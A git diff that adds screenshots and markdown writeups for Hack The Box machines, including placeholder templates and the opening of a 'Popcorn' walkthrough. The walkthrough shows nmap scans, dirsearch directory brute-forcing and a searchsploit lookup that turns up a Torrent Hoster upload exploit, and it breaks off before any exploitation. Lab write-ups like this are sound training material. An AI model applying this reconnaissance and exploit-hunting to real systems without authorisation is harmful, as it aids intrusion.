Binary files /dev/null and b/Hard/prg/3/028.png differ
diff --git a/Hard/prg/3/029.png b/Hard/prg/3/029.png
new file mode 100644
index 0000000..98ca01c
Binary files /dev/null and b/Hard/prg/3/029.png differ
diff --git a/Hard/prg/3/030.png b/Hard/prg/3/030.png
new file mode 100644
index 0000000..650fcab
Binary files /dev/null and b/Hard/prg/3/030.png differ
diff --git a/Hard/prg/3/031.png b/Hard/prg/3/031.png
new file mode 100644
index 0000000..9795bdf
Binary files /dev/null and b/Hard/prg/3/031.png differ
diff --git a/Hard/prg/3/032.png b/Hard/prg/3/032.png
new file mode 100644
index 0000000..e25c2f2
Binary files /dev/null and b/Hard/prg/3/032.png differ
diff --git a/Hard/prg/3/033.png b/Hard/prg/3/033.png
new file mode 100644
index 0000000..d70b05b
Binary files /dev/null and b/Hard/prg/3/033.png differ
diff --git a/Hard/prg/3/034.png b/Hard/prg/3/034.png
new file mode 100644
index 0000000..c977f0a
Binary files /dev/null and b/Hard/prg/3/034.png differ
diff --git a/Hard/prg/3/035.png b/Hard/prg/3/035.png
new file mode 100644
index 0000000..43ad21b
Binary files /dev/null and b/Hard/prg/3/035.png differ
diff --git a/Hard/prg/4/001.png b/Hard/prg/4/001.png
new file mode 100644
index 0000000..5af7ff3
Binary files /dev/null and b/Hard/prg/4/001.png differ
diff --git a/Hard/prg/4/002.png b/Hard/prg/4/002.png
new file mode 100644
index 0000000..26837f2
Binary files /dev/null and b/Hard/prg/4/002.png differ
diff --git a/Hard/prg/4/003.png b/Hard/prg/4/003.png
new file mode 100644
index 0000000..8fa7aa6
Binary files /dev/null and b/Hard/prg/4/003.png differ
diff --git a/Hard/prg/4/004.png b/Hard/prg/4/004.png
new file mode 100644
index 0000000..ef14d1f
Binary files /dev/null and b/Hard/prg/4/004.png differ
diff --git a/Hard/prg/4/005.png b/Hard/prg/4/005.png
new file mode 100644
index 0000000..f660590
Binary files /dev/null and b/Hard/prg/4/005.png differ
diff --git a/Hard/prg/4/006.png b/Hard/prg/4/006.png
new file mode 100644
index 0000000..6d475cf
Binary files /dev/null and b/Hard/prg/4/006.png differ
diff --git a/Hard/prg/4/007.png b/Hard/prg/4/007.png
new file mode 100644
index 0000000..1115399
Binary files /dev/null and b/Hard/prg/4/007.png differ
diff --git a/Hard/prg/4/008.png b/Hard/prg/4/008.png
new file mode 100644
index 0000000..68900ba
Binary files /dev/null and b/Hard/prg/4/008.png differ
diff --git a/Hard/prg/4/009.png b/Hard/prg/4/009.png
new file mode 100644
index 0000000..15ed13b
Binary files /dev/null and b/Hard/prg/4/009.png differ
diff --git a/Hard/prg/4/010.png b/Hard/prg/4/010.png
new file mode 100644
index 0000000..7cb0690
Binary files /dev/null and b/Hard/prg/4/010.png differ
diff --git a/Hard/prg/4/011.png b/Hard/prg/4/011.png
new file mode 100644
index 0000000..469a18c
Binary files /dev/null and b/Hard/prg/4/011.png differ
diff --git a/Hard/prg/4/012.png b/Hard/prg/4/012.png
new file mode 100644
index 0000000..7db3d4e
Binary files /dev/null and b/Hard/prg/4/012.png differ
diff --git a/Hard/prg/4/013.png b/Hard/prg/4/013.png
new file mode 100644
index 0000000..bb14f43
Binary files /dev/null and b/Hard/prg/4/013.png differ
diff --git a/Hard/prg/4/014.png b/Hard/prg/4/014.png
new file mode 100644
index 0000000..c2faa96
Binary files /dev/null and b/Hard/prg/4/014.png differ
diff --git a/Hard/prg/4/015.png b/Hard/prg/4/015.png
new file mode 100644
index 0000000..28732f1
Binary files /dev/null and b/Hard/prg/4/015.png differ
diff --git a/Hard/prg/4/016.png b/Hard/prg/4/016.png
new file mode 100644
index 0000000..1997923
Binary files /dev/null and b/Hard/prg/4/016.png differ
diff --git a/Hard/prg/5/1.png b/Hard/prg/5/1.png
new file mode 100644
index 0000000..20ea1da
Binary files /dev/null and b/Hard/prg/5/1.png differ
diff --git a/Hard/prg/5/2.png b/Hard/prg/5/2.png
new file mode 100644
index 0000000..f01832c
Binary files /dev/null and b/Hard/prg/5/2.png differ
diff --git a/Hard/prg/5/3.png b/Hard/prg/5/3.png
new file mode 100644
index 0000000..2e2544a
Binary files /dev/null and b/Hard/prg/5/3.png differ
diff --git a/Hard/prg/5/4.png b/Hard/prg/5/4.png
new file mode 100644
index 0000000..a56aeba
Binary files /dev/null and b/Hard/prg/5/4.png differ
diff --git a/Hard/prg/5/5.png b/Hard/prg/5/5.png
new file mode 100644
index 0000000..ad6e8cb
Binary files /dev/null and b/Hard/prg/5/5.png differ
diff --git a/Hard/prg/5/6.png b/Hard/prg/5/6.png
new file mode 100644
index 0000000..024afed
Binary files /dev/null and b/Hard/prg/5/6.png differ
diff --git a/Hard/prg/5/7.png b/Hard/prg/5/7.png
new file mode 100644
index 0000000..e559646
Binary files /dev/null and b/Hard/prg/5/7.png differ
diff --git a/Hard/prg/5/8.png b/Hard/prg/5/8.png
new file mode 100644
index 0000000..2dc876c
Binary files /dev/null and b/Hard/prg/5/8.png differ
diff --git a/Hard/prg/5/9.png b/Hard/prg/5/9.png
new file mode 100644
index 0000000..9154f71
Binary files /dev/null and b/Hard/prg/5/9.png differ
diff --git a/Hard/prg/6/1.png b/Hard/prg/6/1.png
new file mode 100644
index 0000000..a8416f3
Binary files /dev/null and b/Hard/prg/6/1.png differ
diff --git a/Hard/prg/6/10.png b/Hard/prg/6/10.png
new file mode 100644
index 0000000..d545995
Binary files /dev/null and b/Hard/prg/6/10.png differ
diff --git a/Hard/prg/6/2.png b/Hard/prg/6/2.png
new file mode 100644
index 0000000..cb451d6
Binary files /dev/null and b/Hard/prg/6/2.png differ
diff --git a/Hard/prg/6/3.png b/Hard/prg/6/3.png
new file mode 100644
index 0000000..0bab903
Binary files /dev/null and b/Hard/prg/6/3.png differ
diff --git a/Hard/prg/6/4.png b/Hard/prg/6/4.png
new file mode 100644
index 0000000..f93c84d
Binary files /dev/null and b/Hard/prg/6/4.png differ
diff --git a/Hard/prg/6/5.png b/Hard/prg/6/5.png
new file mode 100644
index 0000000..e24b8cb
Binary files /dev/null and b/Hard/prg/6/5.png differ
diff --git a/Hard/prg/6/6.png b/Hard/prg/6/6.png
new file mode 100644
index 0000000..763e711
Binary files /dev/null and b/Hard/prg/6/6.png differ
diff --git a/Hard/prg/6/7.png b/Hard/prg/6/7.png
new file mode 100644
index 0000000..6cbc4e8
Binary files /dev/null and b/Hard/prg/6/7.png differ
diff --git a/Hard/prg/6/8.png b/Hard/prg/6/8.png
new file mode 100644
index 0000000..876b911
Binary files /dev/null and b/Hard/prg/6/8.png differ
diff --git a/Hard/prg/6/9.png b/Hard/prg/6/9.png
new file mode 100644
index 0000000..cf79175
Binary files /dev/null and b/Hard/prg/6/9.png differ
diff --git a/Hard/prg/7/1.png b/Hard/prg/7/1.png
new file mode 100644
index 0000000..b2f2632
Binary files /dev/null and b/Hard/prg/7/1.png differ
diff --git a/Hard/prg/7/10.png b/Hard/prg/7/10.png
new file mode 100644
index 0000000..4d98041
Binary files /dev/null and b/Hard/prg/7/10.png differ
diff --git a/Hard/prg/7/11.png b/Hard/prg/7/11.png
new file mode 100644
index 0000000..234b0e4
Binary files /dev/null and b/Hard/prg/7/11.png differ
diff --git a/Hard/prg/7/12.png b/Hard/prg/7/12.png
new file mode 100644
index 0000000..c672a9b
Binary files /dev/null and b/Hard/prg/7/12.png differ
diff --git a/Hard/prg/7/13.png b/Hard/prg/7/13.png
new file mode 100644
index 0000000..ac3e7ef
Binary files /dev/null and b/Hard/prg/7/13.png differ
diff --git a/Hard/prg/7/14.png b/Hard/prg/7/14.png
new file mode 100644
index 0000000..aa78838
Binary files /dev/null and b/Hard/prg/7/14.png differ
diff --git a/Hard/prg/7/15.png b/Hard/prg/7/15.png
new file mode 100644
index 0000000..4aa0e78
Binary files /dev/null and b/Hard/prg/7/15.png differ
diff --git a/Hard/prg/7/16.png b/Hard/prg/7/16.png
new file mode 100644
index 0000000..c7834c9
Binary files /dev/null and b/Hard/prg/7/16.png differ
diff --git a/Hard/prg/7/162.png b/Hard/prg/7/162.png
new file mode 100644
index 0000000..af17c8c
Binary files /dev/null and b/Hard/prg/7/162.png differ
diff --git a/Hard/prg/7/17.png b/Hard/prg/7/17.png
new file mode 100644
index 0000000..1f1e4c4
Binary files /dev/null and b/Hard/prg/7/17.png differ
diff --git a/Hard/prg/7/18.png b/Hard/prg/7/18.png
new file mode 100644
index 0000000..2fea500
Binary files /dev/null and b/Hard/prg/7/18.png differ
diff --git a/Hard/prg/7/19.png b/Hard/prg/7/19.png
new file mode 100644
index 0000000..5d65317
Binary files /dev/null and b/Hard/prg/7/19.png differ
diff --git a/Hard/prg/7/2.png b/Hard/prg/7/2.png
new file mode 100644
index 0000000..e541ea6
Binary files /dev/null and b/Hard/prg/7/2.png differ
diff --git a/Hard/prg/7/3.png b/Hard/prg/7/3.png
new file mode 100644
index 0000000..9f272ab
Binary files /dev/null and b/Hard/prg/7/3.png differ
diff --git a/Hard/prg/7/4.png b/Hard/prg/7/4.png
new file mode 100644
index 0000000..b70162f
Binary files /dev/null and b/Hard/prg/7/4.png differ
diff --git a/Hard/prg/7/5.png b/Hard/prg/7/5.png
new file mode 100644
index 0000000..729af2f
Binary files /dev/null and b/Hard/prg/7/5.png differ
diff --git a/Hard/prg/7/6.png b/Hard/prg/7/6.png
new file mode 100644
index 0000000..42ec547
Binary files /dev/null and b/Hard/prg/7/6.png differ
diff --git a/Hard/prg/7/7.png b/Hard/prg/7/7.png
new file mode 100644
index 0000000..b381f50
Binary files /dev/null and b/Hard/prg/7/7.png differ
diff --git a/Hard/prg/7/8.png b/Hard/prg/7/8.png
new file mode 100644
index 0000000..a283ea1
Binary files /dev/null and b/Hard/prg/7/8.png differ
diff --git a/Hard/prg/7/9.png b/Hard/prg/7/9.png
new file mode 100644
index 0000000..67fdcf0
Binary files /dev/null and b/Hard/prg/7/9.png differ
diff --git a/Hard/prg/8/1.png b/Hard/prg/8/1.png
new file mode 100644
index 0000000..b0038f8
Binary files /dev/null and b/Hard/prg/8/1.png differ
diff --git a/Hard/prg/8/10.png b/Hard/prg/8/10.png
new file mode 100644
index 0000000..391775d
Binary files /dev/null and b/Hard/prg/8/10.png differ
diff --git a/Hard/prg/8/11.png b/Hard/prg/8/11.png
new file mode 100644
index 0000000..a5fbaf7
Binary files /dev/null and b/Hard/prg/8/11.png differ
diff --git a/Hard/prg/8/12.png b/Hard/prg/8/12.png
new file mode 100644
index 0000000..22f5f23
Binary files /dev/null and b/Hard/prg/8/12.png differ
diff --git a/Hard/prg/8/13.png b/Hard/prg/8/13.png
new file mode 100644
index 0000000..b7519d4
Binary files /dev/null and b/Hard/prg/8/13.png differ
diff --git a/Hard/prg/8/14.png b/Hard/prg/8/14.png
new file mode 100644
index 0000000..f7b5ab5
Binary files /dev/null and b/Hard/prg/8/14.png differ
diff --git a/Hard/prg/8/15.png b/Hard/prg/8/15.png
new file mode 100644
index 0000000..ebd509e
Binary files /dev/null and b/Hard/prg/8/15.png differ
diff --git a/Hard/prg/8/16.png b/Hard/prg/8/16.png
new file mode 100644
index 0000000..8fb122d
Binary files /dev/null and b/Hard/prg/8/16.png differ
diff --git a/Hard/prg/8/17.png b/Hard/prg/8/17.png
new file mode 100644
index 0000000..f326907
Binary files /dev/null and b/Hard/prg/8/17.png differ
diff --git a/Hard/prg/8/18.png b/Hard/prg/8/18.png
new file mode 100644
index 0000000..b8fb85c
Binary files /dev/null and b/Hard/prg/8/18.png differ
diff --git a/Hard/prg/8/19.png b/Hard/prg/8/19.png
new file mode 100644
index 0000000..f6da982
Binary files /dev/null and b/Hard/prg/8/19.png differ
diff --git a/Hard/prg/8/2.png b/Hard/prg/8/2.png
new file mode 100644
index 0000000..b3cc67c
Binary files /dev/null and b/Hard/prg/8/2.png differ
diff --git a/Hard/prg/8/20.png b/Hard/prg/8/20.png
new file mode 100644
index 0000000..9778e7f
Binary files /dev/null and b/Hard/prg/8/20.png differ
diff --git a/Hard/prg/8/21.png b/Hard/prg/8/21.png
new file mode 100644
index 0000000..0650731
Binary files /dev/null and b/Hard/prg/8/21.png differ
diff --git a/Hard/prg/8/22.png b/Hard/prg/8/22.png
new file mode 100644
index 0000000..811abd5
Binary files /dev/null and b/Hard/prg/8/22.png differ
diff --git a/Hard/prg/8/23.png b/Hard/prg/8/23.png
new file mode 100644
index 0000000..c067b21
Binary files /dev/null and b/Hard/prg/8/23.png differ
diff --git a/Hard/prg/8/24.png b/Hard/prg/8/24.png
new file mode 100644
index 0000000..fdae390
Binary files /dev/null and b/Hard/prg/8/24.png differ
diff --git a/Hard/prg/8/25.png b/Hard/prg/8/25.png
new file mode 100644
index 0000000..cefba05
Binary files /dev/null and b/Hard/prg/8/25.png differ
diff --git a/Hard/prg/8/26.png b/Hard/prg/8/26.png
new file mode 100644
index 0000000..a527a28
Binary files /dev/null and b/Hard/prg/8/26.png differ
diff --git a/Hard/prg/8/27.png b/Hard/prg/8/27.png
new file mode 100644
index 0000000..0fa0061
Binary files /dev/null and b/Hard/prg/8/27.png differ
diff --git a/Hard/prg/8/28.png b/Hard/prg/8/28.png
new file mode 100644
index 0000000..b2c738e
Binary files /dev/null and b/Hard/prg/8/28.png differ
diff --git a/Hard/prg/8/29.png b/Hard/prg/8/29.png
new file mode 100644
index 0000000..9ef713e
Binary files /dev/null and b/Hard/prg/8/29.png differ
diff --git a/Hard/prg/8/3.png b/Hard/prg/8/3.png
new file mode 100644
index 0000000..5880c83
Binary files /dev/null and b/Hard/prg/8/3.png differ
diff --git a/Hard/prg/8/30.png b/Hard/prg/8/30.png
new file mode 100644
index 0000000..895ee50
Binary files /dev/null and b/Hard/prg/8/30.png differ
diff --git a/Hard/prg/8/31.png b/Hard/prg/8/31.png
new file mode 100644
index 0000000..3a14f2e
Binary files /dev/null and b/Hard/prg/8/31.png differ
diff --git a/Hard/prg/8/32.png b/Hard/prg/8/32.png
new file mode 100644
index 0000000..5d5dc4f
Binary files /dev/null and b/Hard/prg/8/32.png differ
diff --git a/Hard/prg/8/33.png b/Hard/prg/8/33.png
new file mode 100644
index 0000000..3245503
Binary files /dev/null and b/Hard/prg/8/33.png differ
diff --git a/Hard/prg/8/34.png b/Hard/prg/8/34.png
new file mode 100644
index 0000000..d9bc9e7
Binary files /dev/null and b/Hard/prg/8/34.png differ
diff --git a/Hard/prg/8/35.png b/Hard/prg/8/35.png
new file mode 100644
index 0000000..fa72602
Binary files /dev/null and b/Hard/prg/8/35.png differ
diff --git a/Hard/prg/8/36.png b/Hard/prg/8/36.png
new file mode 100644
index 0000000..0cd51ac
Binary files /dev/null and b/Hard/prg/8/36.png differ
diff --git a/Hard/prg/8/4.png b/Hard/prg/8/4.png
new file mode 100644
index 0000000..9ab1922
Binary files /dev/null and b/Hard/prg/8/4.png differ
diff --git a/Hard/prg/8/5.png b/Hard/prg/8/5.png
new file mode 100644
index 0000000..4ae0e87
Binary files /dev/null and b/Hard/prg/8/5.png differ
diff --git a/Hard/prg/8/6.png b/Hard/prg/8/6.png
new file mode 100644
index 0000000..0884291
Binary files /dev/null and b/Hard/prg/8/6.png differ
diff --git a/Hard/prg/8/7.png b/Hard/prg/8/7.png
new file mode 100644
index 0000000..fe92557
Binary files /dev/null and b/Hard/prg/8/7.png differ
diff --git a/Hard/prg/8/8.png b/Hard/prg/8/8.png
new file mode 100644
index 0000000..ebb4db8
Binary files /dev/null and b/Hard/prg/8/8.png differ
diff --git a/Hard/prg/8/9.png b/Hard/prg/8/9.png
new file mode 100644
index 0000000..809854e
Binary files /dev/null and b/Hard/prg/8/9.png differ
diff --git a/Hard/prg/9/1.png b/Hard/prg/9/1.png
new file mode 100644
index 0000000..412e912
Binary files /dev/null and b/Hard/prg/9/1.png differ
diff --git a/Hard/prg/9/10.png b/Hard/prg/9/10.png
new file mode 100644
index 0000000..f2d6fa2
Binary files /dev/null and b/Hard/prg/9/10.png differ
diff --git a/Hard/prg/9/11.png b/Hard/prg/9/11.png
new file mode 100644
index 0000000..24f82db
Binary files /dev/null and b/Hard/prg/9/11.png differ
diff --git a/Hard/prg/9/12.png b/Hard/prg/9/12.png
new file mode 100644
index 0000000..e57c752
Binary files /dev/null and b/Hard/prg/9/12.png differ
diff --git a/Hard/prg/9/13.png b/Hard/prg/9/13.png
new file mode 100644
index 0000000..ec92596
Binary files /dev/null and b/Hard/prg/9/13.png differ
diff --git a/Hard/prg/9/14.png b/Hard/prg/9/14.png
new file mode 100644
index 0000000..61a4d1a
Binary files /dev/null and b/Hard/prg/9/14.png differ
diff --git a/Hard/prg/9/15.png b/Hard/prg/9/15.png
new file mode 100644
index 0000000..7d7ac1f
Binary files /dev/null and b/Hard/prg/9/15.png differ
diff --git a/Hard/prg/9/16.png b/Hard/prg/9/16.png
new file mode 100644
index 0000000..aedc906
Binary files /dev/null and b/Hard/prg/9/16.png differ
diff --git a/Hard/prg/9/17.png b/Hard/prg/9/17.png
new file mode 100644
index 0000000..0c41437
Binary files /dev/null and b/Hard/prg/9/17.png differ
diff --git a/Hard/prg/9/18.png b/Hard/prg/9/18.png
new file mode 100644
index 0000000..8cac2da
Binary files /dev/null and b/Hard/prg/9/18.png differ
diff --git a/Hard/prg/9/19.png b/Hard/prg/9/19.png
new file mode 100644
index 0000000..c19fdb0
Binary files /dev/null and b/Hard/prg/9/19.png differ
diff --git a/Hard/prg/9/2.png b/Hard/prg/9/2.png
new file mode 100644
index 0000000..f13ceb9
Binary files /dev/null and b/Hard/prg/9/2.png differ
diff --git a/Hard/prg/9/20.png b/Hard/prg/9/20.png
new file mode 100644
index 0000000..283795e
Binary files /dev/null and b/Hard/prg/9/20.png differ
diff --git a/Hard/prg/9/21.png b/Hard/prg/9/21.png
new file mode 100644
index 0000000..18a5741
Binary files /dev/null and b/Hard/prg/9/21.png differ
diff --git a/Hard/prg/9/22.png b/Hard/prg/9/22.png
new file mode 100644
index 0000000..55a6cf6
Binary files /dev/null and b/Hard/prg/9/22.png differ
diff --git a/Hard/prg/9/23.png b/Hard/prg/9/23.png
new file mode 100644
index 0000000..161824d
Binary files /dev/null and b/Hard/prg/9/23.png differ
diff --git a/Hard/prg/9/24.png b/Hard/prg/9/24.png
new file mode 100644
index 0000000..e6702db
Binary files /dev/null and b/Hard/prg/9/24.png differ
diff --git a/Hard/prg/9/25.png b/Hard/prg/9/25.png
new file mode 100644
index 0000000..c6f8e2b
Binary files /dev/null and b/Hard/prg/9/25.png differ
diff --git a/Hard/prg/9/26.png b/Hard/prg/9/26.png
new file mode 100644
index 0000000..90693fc
Binary files /dev/null and b/Hard/prg/9/26.png differ
diff --git a/Hard/prg/9/27.png b/Hard/prg/9/27.png
new file mode 100644
index 0000000..3b6fff0
Binary files /dev/null and b/Hard/prg/9/27.png differ
diff --git a/Hard/prg/9/28.png b/Hard/prg/9/28.png
new file mode 100644
index 0000000..deb8aa6
Binary files /dev/null and b/Hard/prg/9/28.png differ
diff --git a/Hard/prg/9/29.png b/Hard/prg/9/29.png
new file mode 100644
index 0000000..75a3eb2
Binary files /dev/null and b/Hard/prg/9/29.png differ
diff --git a/Hard/prg/9/3.png b/Hard/prg/9/3.png
new file mode 100644
index 0000000..b0edf69
Binary files /dev/null and b/Hard/prg/9/3.png differ
diff --git a/Hard/prg/9/30.png b/Hard/prg/9/30.png
new file mode 100644
index 0000000..7f86c0a
Binary files /dev/null and b/Hard/prg/9/30.png differ
diff --git a/Hard/prg/9/31.png b/Hard/prg/9/31.png
new file mode 100644
index 0000000..c8b6094
Binary files /dev/null and b/Hard/prg/9/31.png differ
diff --git a/Hard/prg/9/32.png b/Hard/prg/9/32.png
new file mode 100644
index 0000000..2a8537d
Binary files /dev/null and b/Hard/prg/9/32.png differ
diff --git a/Hard/prg/9/33.png b/Hard/prg/9/33.png
new file mode 100644
index 0000000..e967da7
Binary files /dev/null and b/Hard/prg/9/33.png differ
diff --git a/Hard/prg/9/34.png b/Hard/prg/9/34.png
new file mode 100644
index 0000000..c088d77
Binary files /dev/null and b/Hard/prg/9/34.png differ
diff --git a/Hard/prg/9/35.png b/Hard/prg/9/35.png
new file mode 100644
index 0000000..caea933
Binary files /dev/null and b/Hard/prg/9/35.png differ
diff --git a/Hard/prg/9/36.png b/Hard/prg/9/36.png
new file mode 100644
index 0000000..862c707
Binary files /dev/null and b/Hard/prg/9/36.png differ
diff --git a/Hard/prg/9/37.png b/Hard/prg/9/37.png
new file mode 100644
index 0000000..d9e52ec
Binary files /dev/null and b/Hard/prg/9/37.png differ
diff --git a/Hard/prg/9/38.png b/Hard/prg/9/38.png
new file mode 100644
index 0000000..59f04d1
Binary files /dev/null and b/Hard/prg/9/38.png differ
diff --git a/Hard/prg/9/39.png b/Hard/prg/9/39.png
new file mode 100644
index 0000000..e1c974e
Binary files /dev/null and b/Hard/prg/9/39.png differ
diff --git a/Hard/prg/9/4.png b/Hard/prg/9/4.png
new file mode 100644
index 0000000..1507cdb
Binary files /dev/null and b/Hard/prg/9/4.png differ
diff --git a/Hard/prg/9/40.png b/Hard/prg/9/40.png
new file mode 100644
index 0000000..9b9be48
Binary files /dev/null and b/Hard/prg/9/40.png differ
diff --git a/Hard/prg/9/41.png b/Hard/prg/9/41.png
new file mode 100644
index 0000000..13fc38d
Binary files /dev/null and b/Hard/prg/9/41.png differ
diff --git a/Hard/prg/9/42.png b/Hard/prg/9/42.png
new file mode 100644
index 0000000..6f7e711
Binary files /dev/null and b/Hard/prg/9/42.png differ
diff --git a/Hard/prg/9/43.png b/Hard/prg/9/43.png
new file mode 100644
index 0000000..a9c44a0
Binary files /dev/null and b/Hard/prg/9/43.png differ
diff --git a/Hard/prg/9/44.png b/Hard/prg/9/44.png
new file mode 100644
index 0000000..3cb43ca
Binary files /dev/null and b/Hard/prg/9/44.png differ
diff --git a/Hard/prg/9/45.png b/Hard/prg/9/45.png
new file mode 100644
index 0000000..e8b05c0
Binary files /dev/null and b/Hard/prg/9/45.png differ
diff --git a/Hard/prg/9/46.png b/Hard/prg/9/46.png
new file mode 100644
index 0000000..e24bc01
Binary files /dev/null and b/Hard/prg/9/46.png differ
diff --git a/Hard/prg/9/5.png b/Hard/prg/9/5.png
new file mode 100644
index 0000000..92d1811
Binary files /dev/null and b/Hard/prg/9/5.png differ
diff --git a/Hard/prg/9/6.png b/Hard/prg/9/6.png
new file mode 100644
index 0000000..be10f0d
Binary files /dev/null and b/Hard/prg/9/6.png differ
diff --git a/Hard/prg/9/7.png b/Hard/prg/9/7.png
new file mode 100644
index 0000000..7efb68c
Binary files /dev/null and b/Hard/prg/9/7.png differ
diff --git a/Hard/prg/9/8.png b/Hard/prg/9/8.png
new file mode 100644
index 0000000..254a555
Binary files /dev/null and b/Hard/prg/9/8.png differ
diff --git a/Hard/prg/9/9.png b/Hard/prg/9/9.png
new file mode 100644
index 0000000..cd4851b
Binary files /dev/null and b/Hard/prg/9/9.png differ
diff --git a/Hard/prg/9/linpeas.md b/Hard/prg/9/linpeas.md
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/Hard/prg/9/linpeas.md
@@ -0,0 +1 @@
+
diff --git a/Insane/0.md b/Insane/0.md
new file mode 100644
index 0000000..78996b5
--- /dev/null
+++ b/Insane/0.md
@@ -0,0 +1,38 @@
+# Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 127.0.0.1 ] [~]
+ → nmap -F 127.0.0.1
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-19 22:08 GMT
+ Nmap scan report for localhost (127.0.0.1)
+ Host is up (0.00024s latency).
+ Not shown: 99 closed ports
+ PORT STATE SERVICE
+ 3306/tcp open mysql
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Insane/img/0.png b/Insane/img/0.png
new file mode 100644
index 0000000..8bdf325
Binary files /dev/null and b/Insane/img/0.png differ
diff --git a/Medium/0.md b/Medium/0.md
new file mode 100644
index 0000000..78996b5
--- /dev/null
+++ b/Medium/0.md
@@ -0,0 +1,38 @@
+# Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 127.0.0.1 ] [~]
+ → nmap -F 127.0.0.1
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-19 22:08 GMT
+ Nmap scan report for localhost (127.0.0.1)
+ Host is up (0.00024s latency).
+ Not shown: 99 closed ports
+ PORT STATE SERVICE
+ 3306/tcp open mysql
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Medium/1.md b/Medium/1.md
new file mode 100644
index 0000000..b5a9f63
--- /dev/null
+++ b/Medium/1.md
@@ -0,0 +1,381 @@
+# Popcorn Writeup
+
+
+
+## Introduction :
+
+Popcorn is a Medium linux box released back in march 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → nmap -F 10.10.10.6
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 11:27 GMT
+ Nmap scan report for 10.10.10.6
+ Host is up (0.097s latency).
+ Not shown: 98 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.57 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → nmap -sCV 10.10.10.6 -p80,22
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 11:27 GMT
+ Nmap scan report for 10.10.10.6
+ Host is up (0.10s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
+ |_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
+ 80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
+ |_http-server-header: Apache/2.2.12 (Ubuntu)
+ |_http-title: Site doesn't have a title (text/html).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.64 seconds
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Popcorn]
+ → echo '10.10.10.6 popcorn.htb' >> /etc/hosts
+
+
+
+## **Part 2 : Getting User Access**
+
+Port 80 is opened, let's dirsearch it
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → dirsearch -u http://popcorn.htb -t 50 -e php,html,txt,js -x 403
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u <****url> -e <****php,txt,html,js> -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, html, txt, js | HTTP method: get | Threads: 50 | Wordlist size: 7126
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-20_11-35-28.log
+
+ Target: http://popcorn.htb
+
+ [11:35:28] Starting:
+ [11:35:47] 200 - 177B - /index
+ [11:35:47] 200 - 177B - /index.md
+ [11:35:56] 200 - 48KB - /test
+ [11:35:56] 200 - 48KB - /test/
+ [11:35:56] 200 - 48KB - /test.php
+
+ Task Completed
+
+Dirsearch didn't give us much results, so let's use a bigger wordlist instead
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → dirsearch -u http://popcorn.htb -t 50 -e php,html,txt,js -x 403 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, html, txt, js | HTTP method: get | Threads: 50 | Wordlist size: 220521
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-20_11-55-52.log
+
+ Target: http://popcorn.htb
+
+ [11:55:53] Starting:
+ [11:55:54] 200 - 177B - /
+ [11:55:58] 200 - 48KB - /test
+ [11:55:58] 200 - 177B - /index
+ [11:56:10] 301 - 312B - /torrent -> http://popcorn.htb/torrent/
+ [11:56:37] 301 - 311B - /rename -> http://popcorn.htb/rename/
+
+
+test.php gives off the php information running on the server :
+
+
+
+/torrent reveals a torrent hoster webpage so let's see what exploits are available for us to use on this service :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → searchsploit torrent hoster
+ -------------------------------- -------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ -------------------------------- -------------------------------
+ Torrent Hoster - Remount Upload | exploits/php/webapps/11746.txt
+ -------------------------------- -------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → locate 11746
